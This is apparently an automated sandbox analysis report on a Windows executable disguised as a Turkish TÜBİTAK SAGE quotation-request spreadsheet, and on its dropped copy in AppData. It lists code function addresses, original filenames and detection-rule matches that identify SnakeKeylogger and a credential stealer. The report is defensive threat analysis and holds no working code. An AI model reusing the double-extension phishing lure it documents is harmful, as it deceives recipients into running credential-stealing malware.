                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeCode function: 0_2_062ED5380_2_062ED538
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeCode function: 0_2_062E7C200_2_062E7C20
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeCode function: 0_2_062E9AC00_2_062E9AC0
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeCode function: 0_2_080364100_2_08036410
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeCode function: 0_2_080338A90_2_080338A9
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeCode function: 0_2_080338B80_2_080338B8
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeCode function: 0_2_08033CF00_2_08033CF0
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeCode function: 0_2_080341280_2_08034128
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeCode function: 0_2_080357D00_2_080357D0
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeCode function: 7_2_030A53627_2_030A5362
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeCode function: 7_2_030AD2787_2_030AD278
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeCode function: 7_2_030A71187_2_030A7118
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeCode function: 7_2_030AC1477_2_030AC147
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeCode function: 7_2_030AA0887_2_030AA088
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeCode function: 7_2_030AC7387_2_030AC738
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeCode function: 7_2_030AC46C7_2_030AC46C
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeCode function: 7_2_030ACA087_2_030ACA08
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeCode function: 7_2_030AE9887_2_030AE988
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeCode function: 7_2_030A69A07_2_030A69A0
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeCode function: 7_2_030ACFA97_2_030ACFA9
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeCode function: 7_2_030ACCD87_2_030ACCD8
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeCode function: 7_2_030AF6307_2_030AF630
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeCode function: 7_2_030AFA937_2_030AFA93
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeCode function: 7_2_030A3AA17_2_030A3AA1
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeCode function: 7_2_030AE97B7_2_030AE97B
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeCode function: 7_2_030A39EE7_2_030A39EE
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeCode function: 7_2_030A29EC7_2_030A29EC
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeCode function: 7_2_030A3E097_2_030A3E09
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 9_2_00A33E289_2_00A33E28
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 9_2_00A3E1649_2_00A3E164
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 9_2_00A36F939_2_00A36F93
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 9_2_057ED5389_2_057ED538
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 9_2_057E76709_2_057E7670
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 9_2_057E76609_2_057E7660
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 9_2_057E7C209_2_057E7C20
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 9_2_057E9AC09_2_057E9AC0
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 9_2_06CDA9589_2_06CDA958
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 9_2_06CD57D09_2_06CD57D0
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 9_2_06CD64109_2_06CD6410
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 9_2_06CD41289_2_06CD4128
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 9_2_06CD3CF09_2_06CD3CF0
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 9_2_06CD38B89_2_06CD38B8
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 9_2_06CD38B79_2_06CD38B7
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_0165C14713_2_0165C147
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_0165536213_2_01655362
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_0165D27813_2_0165D278
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_0165C46813_2_0165C468
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_0165C73813_2_0165C738
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_016569A013_2_016569A0
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_0165E98813_2_0165E988
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_0165CA0813_2_0165CA08
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_01659DE013_2_01659DE0
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_0165CCD813_2_0165CCD8
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_01656FC813_2_01656FC8
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_0165CFA913_2_0165CFA9
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_01653E0913_2_01653E09
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_0165F63113_2_0165F631
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_0165E97B13_2_0165E97B
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_016529EC13_2_016529EC
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_01653AA113_2_01653AA1
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_0165FA8813_2_0165FA88
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_0550954813_2_05509548
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_0550296813_2_05502968
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_05509C1813_2_05509C18
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_0550502813_2_05505028
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_05500B3013_2_05500B30
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_055017A013_2_055017A0
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_05501E8013_2_05501E80
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_0550D55013_2_0550D550
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_0550295A13_2_0550295A
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_0550D54013_2_0550D540
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_0550DDFF13_2_0550DDFF
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_0550D99913_2_0550D999
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_0550D9A813_2_0550D9A8
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_0550004013_2_05500040
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_0550FC6813_2_0550FC68
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_0550F81013_2_0550F810
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_0550501C13_2_0550501C
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_0550F80213_2_0550F802
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_0550000613_2_05500006
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_0550D0F813_2_0550D0F8
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_0550CC8F13_2_0550CC8F
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_0550CCA013_2_0550CCA0
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_0550EF5113_2_0550EF51
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_0550EF6013_2_0550EF60
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_0550EB0813_2_0550EB08
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_05500B2013_2_05500B20
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_0550178F13_2_0550178F
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_0550F3B813_2_0550F3B8
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_05508BA013_2_05508BA0
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_0550F3A813_2_0550F3A8
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_0550E25813_2_0550E258
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_0550E24A13_2_0550E24A
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_05501E7013_2_05501E70
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_0550DE0013_2_0550DE00
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_0550EAF813_2_0550EAF8
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_0550E6B013_2_0550E6B0
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_0550E6AF13_2_0550E6AF
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_05ADE1A013_2_05ADE1A0
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_05AD67C013_2_05AD67C0
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_05ADDE8013_2_05ADDE80
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_05AD7DA013_2_05AD7DA0
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_05ADAFA013_2_05ADAFA0
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_05AD938013_2_05AD9380
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_05ADC58013_2_05ADC580
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_05ADF78013_2_05ADF780
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_05AD83E013_2_05AD83E0
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_05ADB5E013_2_05ADB5E0
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_05ADE7E013_2_05ADE7E0
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_05AD99C013_2_05AD99C0
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_05ADCBC013_2_05ADCBC0
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_05AD83D013_2_05AD83D0
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_05ADE7D013_2_05ADE7D0
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_05AD712013_2_05AD7120
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_05ADA32013_2_05ADA320
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_05ADD52013_2_05ADD520
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_05ADF13013_2_05ADF130
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_05AD870013_2_05AD8700
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_05ADB90013_2_05ADB900
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_05ADEB0013_2_05ADEB00
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_05AD776013_2_05AD7760
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_05ADA96013_2_05ADA960
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_05ADDB6013_2_05ADDB60
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_05AD8D4013_2_05AD8D40
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_05ADBF4013_2_05ADBF40
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_05ADF14013_2_05ADF140
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_05AD96A013_2_05AD96A0
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_05ADC8A013_2_05ADC8A0
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_05ADFAA013_2_05ADFAA0
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_05AD7A8013_2_05AD7A80
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_05ADAC8013_2_05ADAC80
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_05AD6AE013_2_05AD6AE0
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_05AD9CE013_2_05AD9CE0
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_05ADCEE013_2_05ADCEE0
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_05AD80C013_2_05AD80C0
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_05ADB2C013_2_05ADB2C0
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_05ADE4C013_2_05ADE4C0
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_05AD8A2013_2_05AD8A20
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_05ADBC2013_2_05ADBC20
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_05ADEE2013_2_05ADEE20
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_05AD002313_2_05AD0023
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_05AD6E0013_2_05AD6E00
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_05ADA00013_2_05ADA000
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_05ADD20013_2_05ADD200
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_05AD906013_2_05AD9060
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_05ADC26013_2_05ADC260
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_05ADF46013_2_05ADF460
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_05AD004013_2_05AD0040
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_05AD744013_2_05AD7440
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_05ADA64013_2_05ADA640
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_05ADD84013_2_05ADD840
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_070E6EF813_2_070E6EF8
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_070E015813_2_070E0158
                Source: 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe, 00000000.00000002.1206895756.0000000003204000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTL.dll" vs 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe
                Source: 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe, 00000000.00000002.1227130329.0000000009660000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe
                Source: 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe, 00000000.00000002.1206895756.00000000031A5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe
                Source: 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe, 00000000.00000000.1176410449.0000000000D9E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameanmZ.exe6 vs 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe
                Source: 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe, 00000000.00000002.1206895756.0000000003301000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTL.dll" vs 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe
                Source: 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe, 00000000.00000002.1211859451.00000000049EE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe
                Source: 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe, 00000000.00000002.1226339145.0000000007F90000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTL.dll" vs 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe
                Source: 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe, 00000000.00000002.1225098663.0000000007EF5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameanmZ.exe6 vs 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe
                Source: 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe, 00000000.00000002.1204234557.00000000014BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe
                Source: 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe, 00000007.00000002.3650522497.000000000043D000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe
                Source: 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe, 00000007.00000002.3651190754.00000000011E7000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe
                Source: 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeBinary or memory string: OriginalFilenameanmZ.exe6 vs 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe
                Source: 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 13.2.gNFUFfdz.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 13.2.gNFUFfdz.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 9.2.gNFUFfdz.exe.3d2fc00.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 9.2.gNFUFfdz.exe.3d2fc00.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 9.2.gNFUFfdz.exe.3d2fc00.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe.49ee880.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe.49ee880.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe.49ee880.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 9.2.gNFUFfdz.exe.3d72c20.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 9.2.gNFUFfdz.exe.3d72c20.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 9.2.gNFUFfdz.exe.3d72c20.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe.4a318a0.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
